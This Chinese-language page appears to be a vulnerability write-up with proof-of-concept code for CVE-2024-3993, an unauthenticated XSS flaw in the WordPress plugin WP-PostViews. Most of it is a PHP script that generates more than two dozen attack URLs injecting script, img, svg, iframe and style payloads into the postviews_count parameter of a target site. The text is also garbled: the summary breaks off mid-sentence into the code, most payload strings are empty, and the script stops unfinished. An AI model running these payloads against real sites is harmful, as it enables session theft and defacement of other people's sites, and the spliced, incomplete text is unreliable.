CVE-2024-3993: WP-PostViews插件未授权XSS漏洞及POC

根据提供的网页截图，以下是关于该漏洞的总结： 漏洞概述 漏洞名称: CVE-2024-3993 (WordPress Plugin - WP-PostViews) 漏洞类型: 跨站脚本攻击 (XSS) 描述: WP-PostViews 插件在 文件中存在跨站脚本攻击漏洞。该漏洞允许未经身份验证的攻击者通过构造恶意请求，利用 参数注入恶意脚本。 影响范围 受影响软件: WordPress 插件 WP-PostViews 受影响版本: 版本 1.7.1 及更早版本 (Affected versions: alert(1)"; $url1 = $target_url . "?postviews_count=" . urlencode($payload1); echo "Test 1 (Basic XSS): " . $url1 . "\n\n"; // 2. XSS via postviews_count with different encoding $payload2 = "%3Cscript%3Ealert(1)%3C/script%3E"; $url2 = $target_url . "?postviews_count=" . $payload2; echo "Test 2 (Encoded XSS): " . $url2 . "\n\n"; // 3. XSS via postviews_count with image tag (img src) $payload3 = ""; $url3 = $target_url . "?postviews_count=" . urlencode($payload3); echo "Test 3 (Img Tag XSS): " . $url3 . "\n\n"; // 4. XSS via postviews_count with body tag $payload4 = ""; $url4 = $target_url . "?postviews_count=" . urlencode($payload4); echo "Test 4 (Body Tag XSS): " . $url4 . "\n\n"; // 5. XSS via postviews_count with input tag $payload5 = ""; $url5 = $target_url . "?postviews_count=" . urlencode($payload5); echo "Test 5 (Input Tag XSS): " . $url5 . "\n\n"; // 6. XSS via postviews_count with svg tag $payload6 = ""; $url6 = $target_url . "?postviews_count=" . urlencode($payload6); echo "Test 6 (SVG Tag XSS): " . $url6 . "\n\n"; // 7. XSS via postviews_count with math tag $payload7 = "alert(1)"; $url7 = $target_url . "?postviews_count=" . urlencode($payload7); echo "Test 7 (Math Tag XSS): " . $url7 . "\n\n"; // 8. XSS via postviews_count with marquee tag $payload8 = ""; $url8 = $target_url . "?postviews_count=" . urlencode($payload8); echo "Test 8 (Marquee Tag XSS): " . $url8 . "\n\n"; // 9. XSS via postviews_count with video tag $payload9 = ""; $url9 = $target_url . "?postviews_count=" . urlencode($payload9); echo "Test 9 (Video Tag XSS): " . $url9 . "\n\n"; // 10. XSS via postviews_count with audio tag $payload10 = ""; $url10 = $target_url . "?postviews_count=" . urlencode($payload10); echo "Test 10 (Audio Tag XSS): " . $url10 . "\n\n"; // 11. XSS via postviews_count with details tag $payload11 = ""; $url11 = $target_url . "?postviews_count=" . urlencode($payload11); echo "Test 11 (Details Tag XSS): " . $url11 . "\n\n"; // 12. XSS via postviews_count with form tag $payload12 = "Click"; $url12 = $target_url . "?postviews_count=" . urlencode($payload12); echo "Test 12 (Form Tag XSS): " . $url12 . "\n\n"; // 13. XSS via postviews_count with object tag $payload13 = ""; $url13 = $target_url . "?postviews_count=" . urlencode($payload13); echo "Test 13 (Object Tag XSS): " . $url13 . "\n\n"; // 14. XSS via postviews_count with embed tag $payload14 = ""; $url14 = $target_url . "?postviews_count=" . urlencode($payload14); echo "Test 14 (Embed Tag XSS): " . $url14 . "\n\n"; // 15. XSS via postviews_count with iframe tag $payload15 = ""; $url15 = $target_url . "?postviews_count=" . urlencode($payload15); echo "Test 15 (Iframe Tag XSS): " . $url15 . "\n\n"; // 16. XSS via postviews_count with base tag $payload16 = ""; $url16 = $target_url . "?postviews_count=" . urlencode($payload16); echo "Test 16 (Base Tag XSS): " . $url16 . "\n\n"; // 17. XSS via postviews_count with link tag $payload17 = ""; $url17 = $target_url . "?postviews_count=" . urlencode($payload17); echo "Test 17 (Link Tag XSS): " . $url17 . "\n\n"; // 18. XSS via postviews_count with style tag $payload18 = "@import 'javascript:alert(1)';"; $url18 = $target_url . "?postviews_count=" . urlencode($payload18); echo "Test 18 (Style Tag XSS): " . $url18 . "\n\n"; // 19. XSS via postviews_count with script tag (again) $payload19 = "alert(1)"; $url19 = $target_url . "?postviews_count=" . urlencode($payload19); echo "Test 19 (Script Tag XSS): " . $url19 . "\n\n"; // 20. XSS via postviews_count with noscript tag $payload20 = "alert(1)"; $url20 = $target_url . "?postviews_count=" . urlencode($payload20); echo "Test 20 (Noscript Tag XSS): " . $url20 . "\n\n"; // 21. XSS via postviews_count with title tag $payload21 = "alert(1)"; $url21 = $target_url . "?postviews_count=" . urlencode($payload21); echo "Test 21 (Title Tag XSS): " . $url21 . "\n\n"; // 22. XSS via postviews_count with meta tag $payload22 = ""; $url22 = $target_url . "?postviews_count=" . urlencode($payload22); echo "Test 22 (Meta Tag XSS): " . $url22 . "\n\n"; // 23. XSS via postviews_count with basefont tag $payload23 = ""; $url23 = $target_url . "?postviews_count=" . urlencode($payload23); echo "Test 23 (Basefont Tag XSS): " . $url23 . "\n\n"; // 24. XSS via postviews_count with bgsound tag $payload24 = ""; $url24 = $target_url . "?postviews_count=" . urlencode($payload24); echo "Test 24 (Bgsound Tag XSS): " . $url24 . "\n\n"; // 25. XSS via postviews_count with blink tag $payload25 = ""; $url25 = $target_url . "?postviews_count=" . urlencode($payload25); echo "Test 25 (Blink Tag XSS): " . $url25 . "\n\n"; // 26. XSS via postviews_count with font tag $payload26 = ""; $url26 = $target_url . "?postviews_count=" . urlencode($payload26); echo "Test 26 (Font Tag

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CVE-2024-3993: WP-PostViews插件未授权XSS漏洞及POC

目标达成感谢每一位支持者 — 我们达成了 100% 目标！